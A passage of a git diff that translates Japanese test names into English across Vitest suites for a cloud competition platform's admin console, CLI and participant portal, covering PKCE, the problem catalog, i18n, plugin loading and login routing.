+  it("should NOT show button when there are zero COMPLETE deployments", async () => {
     mocks.getEvent.mockResolvedValueOnce({
       ...baseDetail,
       deploymentsByProblem: {
@@ -164,7 +164,7 @@ describe("EventDetailPage #756 再デプロイ button", () => {
     expect(screen.queryByText(/再デプロイ/)).not.toBeInTheDocument();
   });
 
-  it("COMPLETE な deployment があると 件数つきで button を表示するべき", async () => {
+  it("should show button with count when COMPLETE deployments exist", async () => {
     mocks.getEvent.mockResolvedValueOnce({
       ...baseDetail,
       deploymentsByProblem: {
@@ -178,7 +178,7 @@ describe("EventDetailPage #756 再デプロイ button", () => {
     expect(await screen.findByText(/再デプロイ \(2 件\)/)).toBeInTheDocument();
   });
 
-  it("button を押すと bulkDeployEvent を forceRedeploy=true で呼ぶべき", async () => {
+  it("should call bulkDeployEvent with forceRedeploy=true when button is pressed", async () => {
     mocks.getEvent.mockResolvedValue({
       ...baseDetail,
       deploymentsByProblem: {

--- a/apps/application-admin-console/test/pages/EventDetail.wizard.test.tsx
+++ b/apps/application-admin-console/test/pages/EventDetail.wizard.test.tsx
@@ -80,7 +80,7 @@ beforeEach(() => {
 afterEach(() => vi.restoreAllMocks());
 
 describe("EventDetailPage #531 Wizard", () => {
-  it("DRAFT のとき「次のアクション」 Alert で Deploy を案内するべき", async () => {
+  it("should guide to Deploy via the 'next action' Alert when status=DRAFT", async () => {
     mocks.getEvent.mockResolvedValueOnce({ ...baseDetail, status: "DRAFT" });
     renderPage();
     await waitFor(() => expect(screen.getAllByText(/Test Event/).length).toBeGreaterThan(0));
@@ -88,21 +88,21 @@ describe("EventDetailPage #531 Wizard", () => {
     expect(alert).toBeInTheDocument();
   });
 
-  it("READY + startsAt なしのとき開始時刻設定を案内するべき", async () => {
+  it("should guide to setting start time when READY without startsAt", async () => {
     mocks.getEvent.mockResolvedValueOnce({ ...baseDetail, status: "READY", startsAt: undefined });
     renderPage();
     const alert = await screen.findByText(/競技開始時刻を設定/);
     expect(alert).toBeInTheDocument();
   });
 
-  it("ENDED のとき Bulk Teardown (Delete) を案内するべき", async () => {
+  it("should guide to Bulk Teardown (Delete) when status=ENDED", async () => {
     mocks.getEvent.mockResolvedValueOnce({ ...baseDetail, status: "ENDED" });
     renderPage();
     const alert = await screen.findByText(/「Delete」 で全 deployment/);
     expect(alert).toBeInTheDocument();
   });
 
-  it("Wizard StepIndicator は 5 段のラベル (作成 / Deploy / 開始時刻設定 / 競技中 / 終了) を表示すべき", async () => {
+  it("should display Wizard StepIndicator with 5 labels (create / Deploy / set start time / in competition / end)", async () => {
     mocks.getEvent.mockResolvedValueOnce({ ...baseDetail, status: "DRAFT" });
     renderPage();
     await waitFor(() => expect(screen.getAllByText(/Test Event/).length).toBeGreaterThan(0));

--- a/apps/cli/test/pkce.test.ts
+++ b/apps/cli/test/pkce.test.ts
@@ -2,23 +2,23 @@ import { describe, expect, it } from "vitest";
 import { generatePkcePair } from "../src/pkce.ts";
 
 describe("generatePkcePair", () => {
-  it("verifier は 43 文字の URL-safe base64 (32 byte random) であるべき", () => {
+  it("should produce a 43-char URL-safe base64 verifier from 32 random bytes", () => {
     const { verifier } = generatePkcePair();
     expect(verifier.length).toBe(43); // 32 bytes → 43 chars urlsafe base64 without padding
     expect(verifier).toMatch(/^[A-Za-z0-9_-]+$/);
   });
 
-  it("challenge は SHA-256 base64url で 43 文字であるべき", () => {
+  it("should produce a 43-char SHA-256 base64url challenge", () => {
     const { challenge } = generatePkcePair();
     expect(challenge.length).toBe(43);
     expect(challenge).toMatch(/^[A-Za-z0-9_-]+$/);
   });
 
-  it("method は S256 であるべき", () => {
+  it("should use S256 as the method", () => {
     expect(generatePkcePair().method).toBe("S256");
   });
 
-  it("2 回呼ぶと別 pair (= randomness 確認)", () => {
+  it("should return a different pair on each call (randomness check)", () => {
     const a = generatePkcePair();
     const b = generatePkcePair();
     expect(a.verifier).not.toBe(b.verifier);

--- a/apps/participant-portal/src/components/EndpointOverrideForm.test.tsx
+++ b/apps/participant-portal/src/components/EndpointOverrideForm.test.tsx
@@ -55,7 +55,7 @@ const baseProps = {
 };
 
 describe("EndpointOverrideForm (Issue #607)", () => {
-  it("mount 時に listProblemEndpoints を呼んで結果を render すべき", async () => {
+  it("should call listProblemEndpoints on mount and render the result", async () => {
     mockList.mockResolvedValue({
       teamId: "t1",
       endpoints: [
@@ -74,7 +74,7 @@ describe("EndpointOverrideForm (Issue #607)", () => {
     expect(mockList).toHaveBeenCalledWith("https://api.x", "k", "p1");
   });
 
-  it("overridable=false の slot は登録 form を出さず注記を出すべき", async () => {
+  it("should not render the registration form and instead show a note for slots with overridable=false", async () => {
     mockList.mockResolvedValue({
       teamId: "t1",
       endpoints: [
@@ -92,7 +92,7 @@ describe("EndpointOverrideForm (Issue #607)", () => {
     expect(screen.queryByRole("button", { name: "登録" })).not.toBeInTheDocument();
   });
 
-  it("endpoints が空配列なら section ごと render しないべき", async () => {
+  it("should not render the section at all when endpoints is empty", async () => {
     mockList.mockResolvedValue({ teamId: "t1", endpoints: [] });
     const { container } = render(withI18n(<EndpointOverrideForm {...baseProps} />));
     await waitFor(() => expect(mockList).toHaveBeenCalled());
@@ -100,7 +100,7 @@ describe("EndpointOverrideForm (Issue #607)", () => {
     expect(container.textContent).not.toContain("Endpoint 登録");
   });
 
-  it("#703: effectiveUrl 未取得 (= deploy 未完) なら raw `-` ではなく CFn Output key 名入りの hint を出すべき", async () => {
+  it("#703: should show a hint including the CFn Output key name instead of raw `-` when effectiveUrl is not yet available (= deploy not complete)", async () => {
     mockList.mockResolvedValue({
       teamId: "t1",
       endpoints: [
@@ -122,7 +122,7 @@ describe("EndpointOverrideForm (Issue #607)", () => {
     expect(screen.getByText(/まだ取得できていません/)).toBeInTheDocument();
   });
 
-  it("登録ボタンで putProblemEndpointOverride を呼び、 response の endpoints で再描画すべき", async () => {
+  it("should call putProblemEndpointOverride on the register button and re-render with response endpoints", async () => {
     const user = userEvent.setup();
     mockList.mockResolvedValue({
       teamId: "t1",
@@ -167,7 +167,7 @@ describe("EndpointOverrideForm (Issue #607)", () => {
     await waitFor(() => expect(screen.getByText("https://lambda.example/")).toBeInTheDocument());
   });
 
-  it("invalid_url の PortalValidationError は競技者向け日本語 inline error を出すべき", async () => {
+  it("should show a competitor-facing Japanese inline error for PortalValidationError with invalid_url", async () => {
     const user = userEvent.setup();
     mockList.mockResolvedValue({
       teamId: "t1",
@@ -184,7 +184,7 @@ describe("EndpointOverrideForm (Issue #607)", () => {
     await waitFor(() => expect(screen.getByText(/URL の形式が不正です/)).toBeInTheDocument());
   });
 
-  it("override 解除ボタンで deleteProblemEndpointOverride を呼ぶべき", async () => {
+  it("should call deleteProblemEndpointOverride when the override-clear button is pressed", async () => {
     const user = userEvent.setup();
     mockList.mockResolvedValue({
       teamId: "t1",
@@ -219,7 +219,7 @@ describe("EndpointOverrideForm (Issue #607)", () => {
     );
   });
 
-  it("空文字を登録しようとしたら API を呼ばず inline error を出すべき", async () => {
+  it("should not call the API and show an inline error when trying to register an empty string", async () => {
     const user = userEvent.setup();
     mockList.mockResolvedValue({
       teamId: "t1",

--- a/apps/participant-portal/src/components/ProblemPanel.test.tsx
+++ b/apps/participant-portal/src/components/ProblemPanel.test.tsx
@@ -66,7 +66,7 @@ describe("ProblemPanel deploy terminal", () => {
     apiMocks.getDeployLogs.mockRejectedValue(new Error("not configured"));
   });
 
-  it("deployLog の terminal 行を表示すべき", () => {
+  it("should display deployLog terminal entries", () => {
     render(
       withI18n(
         <ProblemPanel
@@ -83,7 +83,7 @@ describe("ProblemPanel deploy terminal", () => {
     expect(screen.getByText("CloudFormation stack creation is in progress.")).toBeInTheDocument();
   });
 
-  it("非 terminal status では CodeBuild live log を取得して terminal に表示すべき", async () => {
+  it("should fetch CodeBuild live logs and display them in the terminal for non-terminal status", async () => {
     apiMocks.getDeployLogs.mockResolvedValueOnce({
       jobId: baseProblem.jobId,
       buildStatus: "IN_PROGRESS",
@@ -119,7 +119,7 @@ describe("ProblemPanel deploy terminal", () => {
     );
   });
 
-  it("expiresAt から自動削除までの残り時間を表示すべき", () => {
+  it("should display the remaining time until auto-delete based on expiresAt", () => {
     vi.useFakeTimers();
     vi.setSystemTime(new Date("2026-05-20T00:00:00.000Z"));
     render(
@@ -141,7 +141,7 @@ describe("ProblemPanel deploy terminal", () => {
     expect(screen.getByText(/teardown/)).toBeInTheDocument();
   });
 
-  it("AUTO_DELETED status を停止済みとして表示すべき", () => {
+  it("should display AUTO_DELETED status as stopped", () => {
     render(
       withI18n(
         <ProblemPanel
@@ -161,7 +161,7 @@ describe("ProblemPanel submit helpers", () => {
   const t = (key: string, params?: Readonly<Record<string, string | number>>) =>
     params?.errorCode ? `${key}:${params.errorCode}` : key;
 
-  it("ok / already_scored のとき score refresh 対象にすべき", () => {
+  it("should mark ok / already_scored as score refresh targets", () => {
     expect(shouldRefreshAfterFlagSubmit({ kind: "ok", scoreDelta: 10, totalScore: 20 })).toBe(true);
     expect(shouldRefreshAfterFlagSubmit({ kind: "already_scored", totalScore: 20 })).toBe(true);
     expect(
@@ -174,7 +174,7 @@ describe("ProblemPanel submit helpers", () => {
     ).toBe(false);
   });
 
-  it("scoring gate error をユーザー向け文言に整形すべき", () => {
+  it("should format scoring gate errors into user-facing text", () => {
     expect(
       formatProblemPanelActionError(
         t,
@@ -184,7 +184,7 @@ describe("ProblemPanel submit helpers", () => {
     ).toBe("problem_panel.scoring_gate_paused");
   });
 
-  it("validation error を指定 key の errorCode 付き文言に整形すべき", () => {
+  it("should format validation errors into text using the specified key with errorCode", () => {
     expect(
       formatProblemPanelActionError(
         t,
@@ -194,7 +194,7 @@ describe("ProblemPanel submit helpers", () => {
     ).toBe("problem_panel.submit_error_prefix:invalid_flag");
   });
 
-  it("Error 以外も string 化すべき", () => {
+  it("should stringify non-Error values", () => {
     expect(formatProblemPanelActionError(t, "boom", "problem_panel.validation_error")).toBe("boom");
   });
 });

--- a/apps/participant-portal/src/components/ScoreTimelineChart.test.ts
+++ b/apps/participant-portal/src/components/ScoreTimelineChart.test.ts
@@ -3,7 +3,7 @@ import type { TeamScoreEvents } from "../api/portal-client";
 import { buildCumulativePoints, toScoreTimelineLoadError } from "./ScoreTimelineChart";
 
 describe("ScoreTimelineChart helpers", () => {
-  it("score events を累積 point に変換し invalid timestamp は除外すべき", () => {
+  it("should convert score events into cumulative points and exclude invalid timestamps", () => {
     const team: TeamScoreEvents = {
       teamId: "team-a",
       teamName: "Team A",
@@ -43,7 +43,7 @@ describe("ScoreTimelineChart helpers", () => {
     expect(points[0]?.x.toISOString()).toBe("2026-05-20T10:00:00.000Z");
   });
 
-  it("AbortError は skip、それ以外は error message に変換すべき", () => {
+  it("should skip AbortError and convert other errors into an error message", () => {
     const abort = new Error("aborted");
     abort.name = "AbortError";
 

--- a/apps/participant-portal/src/data/problems.test.ts
+++ b/apps/participant-portal/src/data/problems.test.ts
@@ -22,7 +22,7 @@ function requireProblemMetadata(problemId: string): ProblemCatalogEntry {
 }
 
 describe("findProblemMetadata (Portal build-time catalog #550)", () => {
-  it("hello-world (Challenge sample) が引けて narrative field を含むべき", () => {
+  it("should look up hello-world (Challenge sample) and include narrative fields", () => {
     const m = findProblemMetadata("hello-world");
     expect(m).toBeDefined();
     expect(m?.category).toBe("Challenge");
@@ -33,17 +33,17 @@ describe("findProblemMetadata (Portal build-time catalog #550)", () => {
     expect(m?.shortDescription.length).toBeGreaterThan(0);
   });
 
-  it("hello-world-battle (Battle uptime sample) が引けて category=Battle であるべき", () => {
+  it("should look up hello-world-battle (Battle uptime sample) and have category=Battle", () => {
     const m = findProblemMetadata("hello-world-battle");
     expect(m).toBeDefined();
     expect(m?.category).toBe("Battle");
   });
 
-  it("存在しない id は undefined を返すべき", () => {
+  it("should return undefined for a non-existent id", () => {
     expect(findProblemMetadata("does-not-exist")).toBeUndefined();
   });
 
-  it("Portal は deploy 内部情報 (cfnTemplate 等) を expose しないべき (#550 設計判断)", () => {
+  it("should not expose deploy-internal info (cfnTemplate etc.) from Portal (#550 design decision)", () => {
     const m = findProblemMetadata("hello-world");
     expect(m).toBeDefined();
     // 答えの hint になりうる deploy 内部情報は Portal の型に含めない
@@ -54,7 +54,7 @@ describe("findProblemMetadata (Portal build-time catalog #550)", () => {
   });
 
   // ADR-012 Phase 4: phases / disruptions を portal が予告 panel に出すための data shape pin。
-  it("microservice-migration-battle で phases / disruptions が露出されるべき (ADR-012 Phase 4)", () => {
+  it("should expose phases / disruptions on microservice-migration-battle (ADR-012 Phase 4)", () => {
     const m = findProblemMetadata("microservice-migration-battle");
     expect(m).toBeDefined();
     expect(m?.phases.length).toBeGreaterThanOrEqual(2);
@@ -64,7 +64,7 @@ describe("findProblemMetadata (Portal build-time catalog #550)", () => {
     expect(m?.disruptions[0]?.defaultAfterMinutes).toBe(60);
   });
 
-  it("phases / disruptions に operator 内部 field (effect / parameters / eventDetailType) を露出しないべき", () => {
+  it("should not expose operator-internal fields (effect / parameters / eventDetailType) on phases / disruptions", () => {
     const m = findProblemMetadata("microservice-migration-battle");
     const json = JSON.stringify(m);
     // 採点 internals / Phase 2 用 trigger 情報は競技者には不要 (= 答えの hint や noise 防止)
@@ -74,14 +74,14 @@ describe("findProblemMetadata (Portal build-time catalog #550)", () => {
     expect(json).not.toContain("scorePathOverride");
   });
 
-  it("phases / disruptions が無い問題は空配列を返すべき", () => {
+  it("should return empty arrays for problems without phases / disruptions", () => {
     const m = findProblemMetadata("hello-world");
     expect(m?.phases).toEqual([]);
     expect(m?.disruptions).toEqual([]);
   });
 
   // ADR-012 Phase 5: endpoints[] を portal plugin が build-time catalog から直接読めることを pin。
-  it("microservice-migration-battle で endpoints[] が露出されるべき (ADR-012 Phase 5)", () => {
+  it("should expose endpoints[] on microservice-migration-battle (ADR-012 Phase 5)", () => {
     const m = findProblemMetadata("microservice-migration-battle");
     expect(m?.endpoints).toHaveLength(3);
     expect(m?.endpoints.map((e) => e.slot)).toEqual(
@@ -93,12 +93,12 @@ describe("findProblemMetadata (Portal build-time catalog #550)", () => {
     expect(users?.overridable).toBe(true);
   });
 
-  it("endpoints[] が無い問題は空配列を返すべき", () => {
+  it("should return empty array for problems without endpoints[]", () => {
     expect(findProblemMetadata("hello-world")?.endpoints).toEqual([]);
   });
 
   // ADR-008 / Issue #574 Phase 1: visibility field を catalog に露出する。
-  it("既存 4 問題はすべて visibility='public' で露出されるべき", () => {
+  it("should expose all 4 existing problems with visibility='public'", () => {
     for (const id of [
       "hello-world",
       "hello-world-battle",
@@ -112,7 +112,7 @@ describe("findProblemMetadata (Portal build-time catalog #550)", () => {
 
   // Issue #583 Phase 5: i18n override の locale fallback chain。
   describe("resolveLocalizedNarrative (Phase 5)", () => {
-    it("locale='ja' なら top-level の値をそのまま返すべき", () => {
+    it("should return top-level values as-is for locale='ja'", () => {
       const m = requireProblemMetadata("hello-world");
       const r = resolveLocalizedNarrative(m, "ja");
       expect(r.name).toBe("Hello World (Sample)");
@@ -121,7 +121,7 @@ describe("findProblemMetadata (Portal build-time catalog #550)", () => {
       expect(r.description).toContain("加藤さん");
     });
 
-    it("locale='en' の override が宣言されていれば英語を返すべき (hello-world)", () => {
+    it("should return English when locale='en' override is declared (hello-world)", () => {
       const m = requireProblemMetadata("hello-world");
       const r = resolveLocalizedNarrative(m, "en");
       expect(r.shortDescription).toMatch(/Minimal Challenge/);
@@ -129,7 +129,7 @@ describe("findProblemMetadata (Portal build-time catalog #550)", () => {
       expect(r.learningGoals.length).toBeGreaterThanOrEqual(2);
     });
 
-    it("全 4 既存問題が en の翻訳を持つべき (#1108 で ja+en のみサポート)", () => {
+    it("should have en translations for all 4 existing problems (#1108 only ja+en supported)", () => {
       for (const id of [
         "hello-world",
         "hello-world-battle",
@@ -142,7 +142,7 @@ describe("findProblemMetadata (Portal build-time catalog #550)", () => {
       }
     });
 
-    it("security-battle-royale の locale='en' で英語翻訳を返すべき", () => {
+    it("should return English translation for security-battle-royale at locale='en'", () => {
       const m = requireProblemMetadata("security-battle-royale");
       const r = resolveLocalizedNarrative(m, "en");
       expect(r.shortDescription).toMatch(/Attack\/defend/);

--- a/apps/participant-portal/src/i18n/i18n.test.tsx
+++ b/apps/participant-portal/src/i18n/i18n.test.tsx
@@ -20,12 +20,12 @@ describe("i18n homegrown (Issue #583 Phase 1.A)", () => {
     return <I18nProvider>{children}</I18nProvider>;
   }
 
-  it("default locale は ja (navigator.language 未対応の test 環境 default)", () => {
+  it("should default locale to ja (test env default when navigator.language is unsupported)", () => {
     const { result } = renderHook(() => useI18n(), { wrapper });
     expect(result.current.locale).toMatch(/^(ja|en)$/);
   });
 
-  it("setLocale が localStorage に永続化し次回起動で復元すべき", () => {
+  it("should persist setLocale to localStorage and restore it on next startup", () => {
     const { result } = renderHook(() => useI18n(), { wrapper });
     act(() => result.current.setLocale("en"));
     expect(result.current.locale).toBe("en");
@@ -33,7 +33,7 @@ describe("i18n homegrown (Issue #583 Phase 1.A)", () => {
     expect(window.localStorage.getItem("tenkacloud.portal.locale")).toBe("en");
   });
 
-  it("t() は dot-separated key で nested dictionary を引くべき", () => {
+  it("should look up a nested dictionary with a dot-separated key via t()", () => {
     const { result } = renderHook(() => useI18n(), { wrapper });
     act(() => result.current.setLocale("ja"));
     expect(result.current.t("app.title")).toBe("TenkaCloud 競技者ポータル");
@@ -41,7 +41,7 @@ describe("i18n homegrown (Issue #583 Phase 1.A)", () => {
     expect(result.current.t("app.title")).toBe("TenkaCloud Participant Portal");
   });
 
-  it("locale で key 未定義なら en で fallback、 en にも無ければ raw key", () => {
+  it("should fall back to en when the key is undefined for the locale, and to raw key when en lacks it too", () => {
     const { result } = renderHook(() => useT(), { wrapper });
     // 全 locale にあるキー → 翻訳成功
     expect(result.current("nav.problems")).toBeTruthy();
@@ -50,7 +50,7 @@ describe("i18n homegrown (Issue #583 Phase 1.A)", () => {
     expect(result.current("nonexistent.key")).toBe("nonexistent.key");
   });
 
-  it("t() は params を {name} placeholder で補間すべき (Phase 2 page-level)", () => {
+  it("should interpolate params into {name} placeholders via t() (Phase 2 page-level)", () => {
     const { result } = renderHook(() => useI18n(), { wrapper });
     act(() => result.current.setLocale("ja"));
     expect(result.current.t("home.welcome", { teamName: "Team Alpha" })).toBe(
@@ -62,12 +62,12 @@ describe("i18n homegrown (Issue #583 Phase 1.A)", () => {
     );
   });
 
-  it("params 未指定の placeholder は raw のまま残る (= missing key debug 用)", () => {
+  it("should leave placeholders without supplied params as raw (= for missing key debug)", () => {
     expect(_testInternals.interpolate("Hello, {name}!", {})).toBe("Hello, {name}!");
     expect(_testInternals.interpolate("a={a} b={b}", { a: 1 })).toBe("a=1 b={b}");
   });
 
-  it("SUPPORTED_LOCALES = 2 言語 [ja, en] (#1078 で zh/es 廃止)", () => {
+  it("should support 2 languages in SUPPORTED_LOCALES [ja, en] (#1078 removed zh/es)", () => {
     const supported: readonly LocaleCode[] = ["ja", "en"];
     for (const code of supported) {
       const dict = _testInternals.LOCALE_DICTIONARIES[code];
@@ -77,7 +77,7 @@ describe("i18n homegrown (Issue #583 Phase 1.A)", () => {
     }
   });
 
-  it("locale 変更時に <html lang> が追従すべき", () => {
+  it("should update <html lang> when locale changes", () => {
     const { result } = renderHook(() => useI18n(), { wrapper });
     act(() => result.current.setLocale("en"));
     expect(document.documentElement.lang).toBe("en");
@@ -85,13 +85,13 @@ describe("i18n homegrown (Issue #583 Phase 1.A)", () => {
     expect(document.documentElement.lang).toBe("ja");
   });
 
-  it("useI18n を Provider 外で呼ぶと throw すべき (= configuration error の早期発見)", () => {
+  it("should throw when useI18n is called outside the Provider (= early detection of configuration errors)", () => {
     // renderHook で wrapper を渡さないと throws する
     expect(() => renderHook(() => useI18n())).toThrow(/I18nProvider/);
   });
 
   // 翻訳結果が UI に出ることを実 render で確認
-  it("Provider 配下で翻訳結果が UI に反映されるべき", () => {
+  it("should reflect translation results in the UI under the Provider", () => {
     function Probe() {
       const t = useT();
       return <div>{t("app.loading")}</div>;

--- a/apps/participant-portal/src/plugins/PortalPluginSlots.test.tsx
+++ b/apps/participant-portal/src/plugins/PortalPluginSlots.test.tsx
@@ -44,13 +44,13 @@ afterEach(() => {
 });
 
 describe("PortalPluginSlots (ADR-012 Phase 5)", () => {
-  it("どの slot にも loader が無いなら null を返して何も render しないべき", () => {
+  it("should return null and render nothing when no slot has a loader", () => {
     mockLoadPluginSlot.mockReturnValue(undefined);
     const { container } = render(<PortalPluginSlots {...baseProps} />);
     expect(container.firstChild).toBeNull();
   });
 
-  it("StatusPanel slot が解決できれば該当 component を render すべき", async () => {
+  it("should render the component when the StatusPanel slot resolves", async () => {
     function FakeStatusPanel() {
       return <div data-testid="fake-status">fake status</div>;
     }
@@ -61,7 +61,7 @@ describe("PortalPluginSlots (ADR-012 Phase 5)", () => {
     await waitFor(() => expect(screen.getByTestId("fake-status")).toBeInTheDocument());
   });
 
-  it("plugin が throw すると ErrorBoundary が fallback Alert に降ろすべき (= portal 全体は落ちない)", async () => {
+  it("should let ErrorBoundary fall back to an Alert when a plugin throws (= the whole portal does not crash)", async () => {
     function CrashyPanel(): never {
       throw new Error("plugin runtime crash");
     }
@@ -89,7 +89,7 @@ describe("PortalPluginSlots (ADR-012 Phase 5)", () => {
     }
   });
 
-  it("複数 slot が宣言されていれば PORTAL_SLOT_NAMES の literal 順 (StatusPanel → RegistrationPanel → HelpDrawer) で render すべき", async () => {
+  it("should render multiple declared slots in PORTAL_SLOT_NAMES literal order (StatusPanel -> RegistrationPanel -> HelpDrawer)", async () => {
     function StatusComp() {
       return <div data-testid="slot-status">status</div>;
     }
@@ -115,7 +115,7 @@ describe("PortalPluginSlots (ADR-012 Phase 5)", () => {
   });
 
   // ErrorBoundary class を直接 vs 統合した render path を pin。 stale state を防ぐため別 instance で。
-  it("ErrorBoundary 単体: child の throw を catch して指定 slotName を header に含めるべき", () => {
+  it("ErrorBoundary alone: should catch a child throw and include the given slotName in the header", () => {
     class ProbeErrorBoundary extends Component<
       { slotName: string; children: ReactNode },
       { hasError: boolean; message?: string }

--- a/apps/participant-portal/src/plugins/loader.test.ts
+++ b/apps/participant-portal/src/plugins/loader.test.ts
@@ -10,7 +10,7 @@ afterEach(() => {
  * discover できることと、 metadata.dashboard.slots → component の lookup が正しいことを pin。
  */
 describe("plugin loader (ADR-012 Phase 5)", () => {
-  it("Vite glob で microservice-migration-battle/portal/ の 2 file を discover すべき", () => {
+  it("should discover the 2 files under microservice-migration-battle/portal/ via Vite glob", () => {
     const keys = _listDiscoveredPluginKeys();
     expect(
       keys.some((k) => k.endsWith("/microservice-migration-battle/portal/StatusPanel.tsx")),
@@ -20,34 +20,34 @@ describe("plugin loader (ADR-012 Phase 5)", () => {
     ).toBe(true);
   });
 
-  it("dashboard.slots 宣言済の StatusPanel は React.lazy を返すべき", () => {
+  it("should return React.lazy for StatusPanel declared in dashboard.slots", () => {
     const Comp = loadPluginSlot("microservice-migration-battle", "StatusPanel");
     expect(Comp).toBeDefined();
     // React.lazy は LazyExoticComponent (= 内部に `$$typeof` / `_payload` を持つ)
     expect(typeof Comp).toBe("object");
   });
 
-  it("dashboard.slots 宣言済の RegistrationPanel も React.lazy を返すべき", () => {
+  it("should return React.lazy for RegistrationPanel declared in dashboard.slots as well", () => {
     const Comp = loadPluginSlot("microservice-migration-battle", "RegistrationPanel");
     expect(Comp).toBeDefined();
   });
 
-  it("metadata に slot 宣言が無い HelpDrawer は undefined を返すべき", () => {
+  it("should return undefined for HelpDrawer when the slot is not declared in metadata", () => {
     const Comp = loadPluginSlot("microservice-migration-battle", "HelpDrawer");
     expect(Comp).toBeUndefined();
   });
 
-  it("dashboard.slots を持たない問題 (hello-world) は全 slot で undefined を返すべき", () => {
+  it("should return undefined for all slots when the problem (hello-world) has no dashboard.slots", () => {
     expect(loadPluginSlot("hello-world", "StatusPanel")).toBeUndefined();
     expect(loadPluginSlot("hello-world", "RegistrationPanel")).toBeUndefined();
     expect(loadPluginSlot("hello-world", "HelpDrawer")).toBeUndefined();
   });
 
-  it("存在しない problemId は undefined を返すべき", () => {
+  it("should return undefined for a non-existent problemId", () => {
     expect(loadPluginSlot("does-not-exist", "StatusPanel")).toBeUndefined();
   });
 
-  it("同一 (problemId, slotName) を 2 回呼ぶと同 LazyExoticComponent instance を返すべき (= memoize)", () => {
+  it("should return the same LazyExoticComponent instance when called twice for the same (problemId, slotName) (= memoize)", () => {
     const a = loadPluginSlot("microservice-migration-battle", "StatusPanel");
     const b = loadPluginSlot("microservice-migration-battle", "StatusPanel");
     expect(a).toBeDefined();

--- a/apps/participant-portal/src/plugins/props-builder.test.ts
+++ b/apps/participant-portal/src/plugins/props-builder.test.ts
@@ -11,7 +11,7 @@ import {
  * 漏れないことを assertion で確認 (= "portal は plugin の信頼境界" 原則)。
  */
 describe("buildPortalEndpointsFromOutputs", () => {
-  it("metadata.endpoints[] と stackOutputs から effectiveUrl を組み立てるべき", () => {
+  it("should build effectiveUrl from metadata.endpoints[] and stackOutputs", () => {
     const endpoints = buildPortalEndpointsFromOutputs("microservice-migration-battle", {
       BaseUrl: "http://ec2-1-2-3-4.compute.amazonaws.com",
     });
@@ -22,21 +22,21 @@ describe("buildPortalEndpointsFromOutputs", () => {
     expect(users?.overridable).toBe(true);
   });
 
-  it("stackOutputs に該当 key が無いなら defaultUrl は undefined にすべき", () => {
+  it("should leave defaultUrl undefined when stackOutputs lacks the key", () => {
     const endpoints = buildPortalEndpointsFromOutputs("microservice-migration-battle", {});
     expect(endpoints[0]?.defaultUrl).toBeUndefined();
     expect(endpoints[0]?.effectiveUrl).toBeUndefined();
   });
 
-  it("metadata.endpoints[] が無い問題 (hello-world) は空配列を返すべき", () => {
+  it("should return empty array for a problem (hello-world) without metadata.endpoints[]", () => {
     expect(buildPortalEndpointsFromOutputs("hello-world", {})).toEqual([]);
   });
 
-  it("存在しない problemId は空配列を返すべき", () => {
+  it("should return empty array for a non-existent problemId", () => {
     expect(buildPortalEndpointsFromOutputs("does-not-exist", {})).toEqual([]);
   });
 
-  it("malformed base URL (CFn output が空文字 / 不正) は context 付きで throw すべき (= silent skip しない)", () => {
+  it("should throw with context for malformed base URL (CFn output empty / invalid) (= no silent skip)", () => {
     // base に malformed URL を投入し joinUrl で `new URL("/users", "not-a-url/")` が
     // throw する case。 silent undefined fallback は metadata / output 異常を隠してしまうので、
     // context (= problemId / slot / key) 付き Error を rethrow することで debuggable にする。
@@ -49,7 +49,7 @@ describe("buildPortalEndpointsFromOutputs", () => {
 });
 
 describe("buildPortalPhases", () => {
-  it("publicHint=true な phases のみ返すべき (#689 — ネタバレ防止)", () => {
+  it("should return only phases with publicHint=true (#689 — spoiler prevention)", () => {
     // microservice-migration-battle は phases[] に degraded / legacy を持つが、 default
     // (= publicHint 未指定) では portal に出さない。 metadata 作者が明示的に publicHint=true
     // を立てた entry のみ portal に届く。
@@ -57,31 +57,31 @@ describe("buildPortalPhases", () => {
     expect(phases.every((p) => p.publicHint === true)).toBe(true);
   });
 
-  it("operator 内部 field (= effect / switchPlatformToDegraded) を plugin に流さない", () => {
+  it("should not leak operator-internal fields (= effect / switchPlatformToDegraded) to plugins", () => {
     const phases = buildPortalPhases("microservice-migration-battle");
     const json = JSON.stringify(phases);
     expect(json).not.toContain("switchPlatformToDegraded");
     expect(json).not.toContain("scorePathOverride");
   });
 
-  it("phases[] が無い問題は空配列を返すべき", () => {
+  it("should return empty array for problems without phases[]", () => {
     expect(buildPortalPhases("hello-world")).toEqual([]);
   });
 });
 
 describe("buildPortalDisruptions", () => {
-  it("publicHint=true な disruptions のみ返すべき (#689 — ネタバレ防止)", () => {
+  it("should return only disruptions with publicHint=true (#689 — spoiler prevention)", () => {
     const out = buildPortalDisruptions("microservice-migration-battle");
     expect(out.every((d) => d.publicHint === true)).toBe(true);
   });
 
-  it("disruptions[] が無い問題は空配列を返すべき", () => {
+  it("should return empty array for problems without disruptions[]", () => {
     expect(buildPortalDisruptions("hello-world")).toEqual([]);
     expect(buildPortalDisruptions("hello-world-battle")).toEqual([]);
     expect(buildPortalDisruptions("security-battle-royale")).toEqual([]);
   });
 
-  it("存在しない problemId は空配列を返すべき", () => {
+  it("should return empty array for a non-existent problemId", () => {
     expect(buildPortalDisruptions("does-not-exist")).toEqual([]);
   });
 });

--- a/apps/participant-portal/test/App.test.tsx
+++ b/apps/participant-portal/test/App.test.tsx
@@ -37,28 +37,28 @@ describe("App", () => {
     sessionStorage.clear();
   });
 
-  describe("/login にアクセスしたとき", () => {
-    it("LoginPage が表示されサインインボタンを持つべき", async () => {
+  describe("when accessing /login", () => {
+    it("should render LoginPage with a sign-in button", async () => {
       renderApp("/login");
       expect(await screen.findByRole("button", { name: "サインイン" })).toBeInTheDocument();
     });
   });
 
-  describe("未認証で / にアクセスしたとき", () => {
-    it("LoginPage へ redirect されるべき", async () => {
+  describe("when accessing / while unauthenticated", () => {
+    it("should redirect to LoginPage", async () => {
       renderApp("/");
       expect(await screen.findByRole("button", { name: "サインイン" })).toBeInTheDocument();
     });
   });
 
-  describe("チームログインキー入力 → サインイン", () => {
-    it("空のキーではサインインボタンは disable されているべき", async () => {
+  describe("team login key input -> sign-in", () => {
+    it("should disable the sign-in button when the key is empty", async () => {
       renderApp("/login");
       const button = await screen.findByRole("button", { name: "サインイン" });
       expect(button).toBeDisabled();
     });
 
-    it("非空のキーを入れて submit すると Home (Welcome) に遷移するべき", async () => {
+    it("should navigate to Home (Welcome) when submitting a non-empty key", async () => {
       const user = userEvent.setup();
       renderApp("/login");
 
@@ -77,8 +77,8 @@ describe("App", () => {
     });
   });
 
-  describe("既ログイン状態で /login に再アクセスしたとき (Issue #496)", () => {
